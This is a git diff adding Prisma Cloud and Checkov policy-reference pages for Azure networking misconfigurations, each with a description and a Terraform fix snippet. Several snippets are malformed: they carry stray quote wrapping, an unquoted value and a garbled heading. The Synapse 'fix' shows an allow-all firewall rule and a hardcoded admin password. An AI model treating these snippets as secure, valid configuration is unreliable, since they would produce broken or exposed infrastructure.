https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py[CKV_AZURE_89] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By ensuring that your Azure cache for Redis is not public, you can help protect your data from unauthorized access or tampering. +Public cache for Redis are accessible over the internet, which can make them vulnerable to external threats such as hackers or malware. +By making it private, you can help ensure that only authorized users can access the data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_redis_cache +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +resource "azurerm_redis_cache" "example" { + ... ++ public_network_access_enabled = false + ... + } + } +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cognitive-search-disables-public-network-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cognitive-search-disables-public-network-access.adoc new file mode 100644 index 000000000..76a16492c --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cognitive-search-disables-public-network-access.adoc @@ -0,0 +1,56 @@ +== Azure cognitive search does not disable public network access +// Azure Cognitive Search enables public network access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 32e96093-7c64-4618-86e2-832848acbd92 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py[CKV_AZURE_124] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +It is generally a good security practice to ensure that your Azure Cognitive Search instance does not have public network access enabled, as this means that it is only accessible from within your private network. +This can help to protect your search instance from unauthorized access, as external parties will not be able to connect to it over the internet. +It is especially important to ensure that public network access is disabled if your Azure Cognitive Search instance contains sensitive or confidential data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_search_service +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +{ + "resource "azurerm_search_service" "example" { + ... + + public_network_access_enabled = false +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-container-container-group-is-deployed-into-virtual-network.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-container-container-group-is-deployed-into-virtual-network.adoc new file mode 100644 index 000000000..a208ac599 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-container-container-group-is-deployed-into-virtual-network.adoc @@ -0,0 +1,57 @@ +== zure container container group is not deployed into a virtual network +// Azure Container group not deployed into a virtual network + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| dd2feacf-8890-43e9-ab55-651bf3ae1c03 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py[CKV_AZURE_98] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +A virtual network is a logical network in Azure that is isolated from other networks. +When you deploy a container group into a virtual network, you can control the inbound and outbound network traffic to and from your container group using network security groups (NSGs) and service endpoints. +This can help to improve the security of your container group and protect it from unauthorized access or attacks. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_container_group +* *Arguments:* network_profile_id + + +[source,go] +---- +{ + " resource "azurerm_container_group" "example" { + ... + + + network_profile_id = "network_profile_id" + }", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cosmos-db-disables-public-network-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cosmos-db-disables-public-network-access.adoc new file mode 100644 index 000000000..1b766b69b --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cosmos-db-disables-public-network-access.adoc @@ -0,0 +1,52 @@ +== Azure Cosmos DB enables public network access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 24bcd432-30aa-4ec4-b379-c3d5a69cbd54 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py[CKV_AZURE_101] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By ensuring that your Azure Cosmos DB is not public, you can help protect your data from unauthorized access or tampering. +Public Azure Cosmos DBs are accessible over the internet, which can make them vulnerable to external threats such as hackers or malware. +By making it private, you can help ensure that only authorized users can access the data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_cosmosdb_account +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +resource "azurerm_cosmosdb_account" "db" { + ... + + public_network_access_enabled = false + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-data-factory-public-network-access-is-disabled.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-data-factory-public-network-access-is-disabled.adoc new file mode 100644 index 000000000..729524439 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-data-factory-public-network-access-is-disabled.adoc @@ -0,0 +1,57 @@ +== Azure Data Factory (V2) configured with overly permissive network access +// Azure Data Factory (V2) configured with excessive permissive network access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d96a6d5b-0399-45dc-8fac-db55d711710b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py[CKV_AZURE_104] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By ensuring that your Azure Data factory is not public, you can help protect your data from unauthorized access or tampering. +Public Azure Data factory instances are accessible over the internet, which can make them vulnerable to external threats such as hackers or malware. +By making it private, you can help ensure that only authorized users can access the data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_data_factory +* *Arguments:* public_network_enabled + + +[source,go] +---- +{ + "resource "azurerm_data_factory" "example" { + ... ++ public_network_enabled = false + }", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-event-grid-domain-public-network-access-is-disabled.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-event-grid-domain-public-network-access-is-disabled.adoc new file mode 100644 index 000000000..3f013e4f3 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-event-grid-domain-public-network-access-is-disabled.adoc @@ -0,0 +1,56 @@ +== Azure Event Grid domain public network access is enabled +// Azure Event Grid domain public network access enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 58c7b0ec-3c69-4879-bdab-35dd49536d7b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py[CKV_AZURE_106] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By ensuring that your Azure Event Grid domain is not public, you can help protect your data from unauthorized access or tampering. +Public Azure Event Grid domains are accessible over the internet, which can make them vulnerable to external threats such as hackers or malware. +By making it private, you can help ensure that only authorized users can access the data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_eventgrid_domain +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +{ + " resource "azurerm_eventgrid_domain" "example" { + ... ++ public_network_access_enabled = false + }", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-file-sync-disables-public-network-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-file-sync-disables-public-network-access.adoc new file mode 100644 index 000000000..179491ed3 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-file-sync-disables-public-network-access.adoc @@ -0,0 +1,53 @@ +== Azure file sync enables public network access +// Azure File Sync enables public network access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7a1f479f-5ccf-4505-a2c2-ff8c2b65d6c0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py[CKV_AZURE_64] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By ensuring that your Azure file sync is not public, you can help protect your data from unauthorized access or tampering. +Public Azure file sync are accessible over the internet, which can make them vulnerable to external threats such as hackers or malware. +By making it private, you can help ensure that only authorized users can access the data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_storage_sync +* *Arguments:* incoming_traffic_policy + + +[source,go] +---- +resource "azurerm_storage_sync" "test" { + ... ++ incoming_traffic_policy = AllowVirtualNetworksOnly + } +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-front-door-enables-waf.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-front-door-enables-waf.adoc new file mode 100644 index 000000000..c3399a72d --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-front-door-enables-waf.adoc @@ -0,0 +1,58 @@ +== Azure Front Door does not have the Azure Web application firewall (WAF) enabled +// Azure Web Application Firewall (WAF) disabled for Azure Front Door + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5ef0bea5-11c9-497d-9637-4a430368c754 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py[CKV_AZURE_121] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +WAF is a security feature that provides protection for web applications by inspecting incoming traffic and blocking malicious requests before they reach the application. +When WAF is enabled on an Azure Front Door, it analyzes incoming traffic to the front door and blocks requests that are determined to be malicious based on a set of rules. +This can help to protect your application from a variety of threats, such as SQL injection attacks, cross-site scripting (XSS) attacks, and other types of attacks. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_frontdoor +* *Arguments:* web_application_firewall_policy_link_id + + +[source,go] +---- +{ + "resource "azurerm_frontdoor" "example" { + ... ++ web_application_firewall_policy_link_id = "this_is_id" + ... + }", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-front-door-uses-waf-in-detection-or-prevention-modes.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-front-door-uses-waf-in-detection-or-prevention-modes.adoc new file mode 100644 index 000000000..197b757f2 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-front-door-uses-waf-in-detection-or-prevention-modes.adoc @@ -0,0 +1,63 @@ +== Azure front door does not use WAF in Detection or Prevention modes +// Azure Front Door does not use Web Application Firewall (WAF) in Detection or Prevention mode + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 53b040ee-039c-49f2-82dd-d4187eacf5fd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py[CKV_AZURE_123] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +WAF has two modes: Detection and Prevention. +In Detection mode, WAF analyzes incoming traffic to the Azure front door and logs any requests that are determined to be malicious based on a set of rules. +This can help you to identify potential security threats and take appropriate action to protect your application. +In Prevention mode, WAF analyzes incoming traffic to the application gateway and blocks any requests that are determined to be malicious based on a set of rules. +This can help to prevent malicious requests from reaching your application and potentially causing damage. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_frontdoor_firewall_policy +* *Arguments:* policy_settings.enabled + policy_settings.mode + + +[source,go] +---- +resource "azurerm_frontdoor_firewall_policy" "example" { + + ... + policy_settings { + + enabled = true + + mode = "Prevention" + request_body_check = true + file_upload_limit_in_mb = 100 + max_request_body_size_in_kb = 128 + } + ... + } +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-iot-hub-disables-public-network-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-iot-hub-disables-public-network-access.adoc new file mode 100644 index 000000000..c135262fd --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-iot-hub-disables-public-network-access.adoc @@ -0,0 +1,60 @@ +== Azure IoT Hub enables public network access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 53001655-cd04-47e1-93cc-406be8836f38 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py[CKV_AZURE_108] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By ensuring that your IoT Hub is not public, you can help protect your data from unauthorized access or tampering. +Public IoT Hubs are accessible over the internet, which can make them vulnerable to external threats such as hackers or malware. +By making it private, you can help ensure that only authorized users can access the data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_iothub +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +resource "azurerm_iothub" "example" { + ... ++ public_network_access_enabled = false + route { + name = "export" + source = "DeviceMessages" + condition = "true" + endpoint_names = ["export"] + enabled = true + } + ... + } +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-synapse-workspaces-enables-managed-virtual-networks.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-synapse-workspaces-enables-managed-virtual-networks.adoc new file mode 100644 index 000000000..a959a72ee --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-synapse-workspaces-enables-managed-virtual-networks.adoc @@ -0,0 +1,53 @@ +== Azure Synapse Workspaces do not enable managed virtual networks +// Managed virtual networks in Azure Synapse Workspaces disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 83494f5a-bfc0-418d-8b68-3bb20e5e4505 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py[CKV_AZURE_58] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +Enabling managed virtual networks in Azure Synapse Workspaces can help to improve security and isolation for your data and workloads. +By using a managed virtual network, you can control access to your data and resources by defining network security rules and configuring network routing. +Managed virtual networks can also help to improve the performance of your data and analytics workloads by reducing network latency and optimizing network traffic. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_synapse_workspace +* *Arguments:* managed_virtual_network_enabled + + +[source,go] +---- +resource "azurerm_synapse_workspace" "example" { + ... ++ managed_virtual_network_enabled = true + } +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-synapse-workspaces-have-no-ip-firewall-rules-attached.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-synapse-workspaces-have-no-ip-firewall-rules-attached.adoc new file mode 100644 index 000000000..3726f4f6c --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-synapse-workspaces-have-no-ip-firewall-rules-attached.adoc @@ -0,0 +1,77 @@ +== Azure Synapse workspaces have IP firewall rules attached +// Azure Synapse Workspaces have IP firewall rules attached + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 505eef98-6fa3-4982-908a-991d8870e54a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml[CKV2_AZURE_19] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +IP firewall rules in Azure Synapse are used to control inbound and outbound network traffic to and from your workspace. +By attaching IP firewall rules to your workspace, you can control which IP addresses or ranges have access to your workspace and what actions they can perform. +However, attaching IP firewall rules to your workspace can also introduce potential security risks because it allows you to specify specific IP addresses or ranges that have access to your workspace. +If an attacker is able to determine the IP address of your workspace, they could potentially gain access to it if the IP address is included in the firewall rules. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_synapse_firewall_rule, azurerm_resource_group, azurerm_synapse_workspace +* *Arguments:* synapse_workspace_id (of _azurerm_synapse_firewall_rule_ ) + + +[source,go] +---- +{ + "resource "azurerm_resource_group" "example" { + name = "example-resources" + location = "West Europe" +} + + +resource "azurerm_synapse_workspace" "workspace_good" { + name = "example" + sql_administrator_login = "sqladminuser" + sql_administrator_login_password = "H@Sh1CoR3!" + managed_virtual_network_enabled = true + tags = { + Env = "production" + } + +} + + +resource "azurerm_synapse_firewall_rule" "firewall_rule" { + name = "AllowAll" + synapse_workspace_id = azurerm_synapse_workspace.workspace_bad.id + start_ip_address = "0.0.0.0" + end_ip_address = "255.255.255.255" +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-function-apps-is-only-accessible-over-https.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-function-apps-is-only-accessible-over-https.adoc new file mode 100644 index 000000000..9181ff957 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-function-apps-is-only-accessible-over-https.adoc @@ -0,0 +1,53 @@ +== Azure Function App doesn't redirect HTTP to HTTPS +// Azure Function App does not redirect HTTP traffic to HTTPS + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 46d8388d-72e4-413c-9a44-3670df42cfea + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py[CKV_AZURE_70] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By ensuring that function apps are only accessible over HTTPS, you can help to protect the data transmitted to and from your app from being accessed or modified by unauthorized parties. +This can help to improve the security of your app and protect it from potential threats such as man-in-the-middle attacks or data breaches. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* https_only + + +[source,go] +---- +resource "azurerm_app_service" "example" { + ... + + https_only = true + } +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-key-vault-allows-firewall-rules-settings.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-key-vault-allows-firewall-rules-settings.adoc new file mode 100644 index 000000000..b5aa47363 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-key-vault-allows-firewall-rules-settings.adoc @@ -0,0 +1,59 @@ +== Key vault does not allow firewall rules settings +// Azure Key Vault does not allow firewall rules settings + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ba230f7b-fea0-405b-b022-bc0bded68577 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py[CKV_AZURE_109] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Key vault's firewall prevents unauthorized traffic from reaching your key vault and provides an additional layer of protection for your secrets. +Enable the firewall to make sure that only traffic from allowed networks can access your key vault. +By defining "bypass=AzureServices" and "default_action= "deny" - only matched ip_rules and/or virtual_network_subnet_ids will be passed + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_key_vault +* *Arguments:* network_acls.default_action + + +[source,go] +---- +{ + "resource "azurerm_key_vault" "example" { + ... + + network_acls { + + default_action = "Deny" + + bypass = "AzureServices" + } + + }", +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-network-interfaces-disable-ip-forwarding.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-network-interfaces-disable-ip-forwarding.adoc new file mode 100644 index 000000000..b0794b64f --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-network-interfaces-disable-ip-forwarding.adoc @@ -0,0 +1,56 @@ +== Azure Virtual machine NIC has IP forwarding enabled +// Azure Virtual Machine NIC IP forwarding enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e3b0e339-22bd-4b91-9157-e1e7482334f3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py[CKV_AZURE_118] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By disabling IP forwarding on the NIC of your Azure virtual machine, you can help to prevent the virtual machine from acting as a router and forwarding traffic to unintended destinations. +This can help to improve the security of your virtual machine and protect it from potential threats such as man-in-the-middle attacks or data breaches. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_network_interface +* *Arguments:* enable_ip_forwarding + + +[source,go] +---- +{ + "resource "azurerm_network_interface" "example" { + ... + + enable_ip_forwarding = false + }", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-network-interfaces-dont-use-public-ips.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-network-interfaces-dont-use-public-ips.adoc new file mode 100644 index 000000000..aa36be400 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-network-interfaces-dont-use-public-ips.adoc @@ -0,0 +1,71 @@ +== Network interfaces use public IPs +// Network interfaces use public IP addresses + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b811692c-9a16-421f-b8f0-847064165f5f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV_AZURE_119] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +A public IP address is an IPv4 address that is reachable from the Internet. +You can use public addresses for communication between your instances and the Internet. +We recommend you control whether your network interfaces are required to use a public IP address. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_network_interface +* *Arguments:* ip_configuration.public_ip_address_id (not exists) + + +[source,go] +---- +{ + " resource "azurerm_network_interface" "example" { + name = "example-nic" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + + ip_configuration { + name = "internal" + subnet_id = azurerm_subnet.example.id + private_ip_address_allocation = "Dynamic" + } + + ip_configuration { + name = "internal2" + subnet_id = azurerm_subnet.example.id2 + private_ip_address_allocation = "Dynamic" + } + + enable_ip_forwarding = false + }", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-only-ssl-are-enabled-for-cache-for-redis.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-only-ssl-are-enabled-for-cache-for-redis.adoc new file mode 100644 index 000000000..2c292db6e --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-only-ssl-are-enabled-for-cache-for-redis.adoc @@ -0,0 +1,56 @@ +== Not only SSL are enabled for cache for Redis +// Not only SSL is enabled for cache for Redis + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ae1e5122-48d7-47c4-8493-ce3e97a0f488 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py[CKV_AZURE_91] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +SSL helps protect your data from unauthorized access or tampering by encrypting the data as it is transmitted between the Redis instance and the client. +By enabling SSL, you can help ensure that only authorized users with the correct keys can access and decrypt the data, and that the data is protected while in transit. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_redis_cache +* *Arguments:* enable_non_ssl_port + + +[source,go] +---- +{ + " resource "azurerm_redis_cache" "example" { + ... + + enable_non_ssl_port = false + ... + }", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-postgresql-server-disables-public-network-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-postgresql-server-disables-public-network-access.adoc new file mode 100644 index 000000000..d7bad0d60 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-postgresql-server-disables-public-network-access.adoc @@ -0,0 +1,55 @@ +== PostgreSQL server does not disable public network access +// PostgreSQL server public network access enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a07a21c2-bea9-4e5e-8903-aba5c9e6bf02 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py[CKV_AZURE_68] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +Disabling the public network access property improves security by ensuring your Azure Database for PostgreSQL single servers can only be accessed from a private endpoint. +This configuration strictly disables access from any public address space outside of Azure IP range and denies all logins that match IP or virtual network-based firewall rules. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_server +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +{ + "resource "azurerm_postgresql_server" "example" { + ... ++ public_network_access_enabled = false + ... + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-sql-server-disables-public-network-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-sql-server-disables-public-network-access.adoc new file mode 100644 index 000000000..36407e470 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-sql-server-disables-public-network-access.adoc @@ -0,0 +1,55 @@ +== SQL Server is enabled for public network access +// SQL Server public network access enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bfa52af6-2560-48c3-bec8-966da86abb88 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py[CKV_AZURE_113] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By ensuring that your SQL server is not public, you can help protect your data from unauthorized access or tampering. +Public SQL servers are accessible over the internet, which can make them vulnerable to external threats such as hackers or malware. +By making it private, you can help ensure that only authorized users can access the data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mssql_server +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +{ + "resource "azurerm_mssql_server" "example" { + ... + + public_network_access_enabled = false + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-storage-account-enables-secure-transfer.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-storage-account-enables-secure-transfer.adoc new file mode 100644 index 000000000..49d599cec --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-storage-account-enables-secure-transfer.adoc @@ -0,0 +1,59 @@ +== Storage Accounts without Secure transfer enabled +// Azure Storage Accounts without Secure transfer enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bc4e467f-10fa-471e-aa9b-28981dc73e93 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountEnablesSecureTransfer.py[CKV_AZURE_60] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +The secure transfer option enhances the security of a storage account by only allowing requests to the storage account by a secure connection. +For example, when calling REST APIs to access storage accounts, the connection must use HTTPS. +Any requests using HTTP will be rejected when 'secure transfer required' is enabled. +When using the Azure files service, connection without encryption will fail, including scenarios using SMB 2.1, SMB 3.0 without encryption, and some flavors of the Linux SMB client. +Because Azure storage doesn't support HTTPS for custom domain names, this option is not applied when using a custom domain name. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_storage_account +* *Arguments:* enable_https_traffic_only + + +[source,go] +---- +{ + " resource "azurerm_storage_account" "example" { + ... + + enable_https_traffic_only = true + }", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-storage-accounts-disallow-public-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-storage-accounts-disallow-public-access.adoc new file mode 100644 index 000000000..f3411f33c --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-storage-accounts-disallow-public-access.adoc @@ -0,0 +1,83 @@ +== Azure storage account does allow public access +// Azure storage account allows public access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8409051e-b72e-4e3e-b144-feea51984e64 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py[CKV_AZURE_59] + +|Severity +|LOW + +|Subtype +|Build +// ,Run +|Frameworks 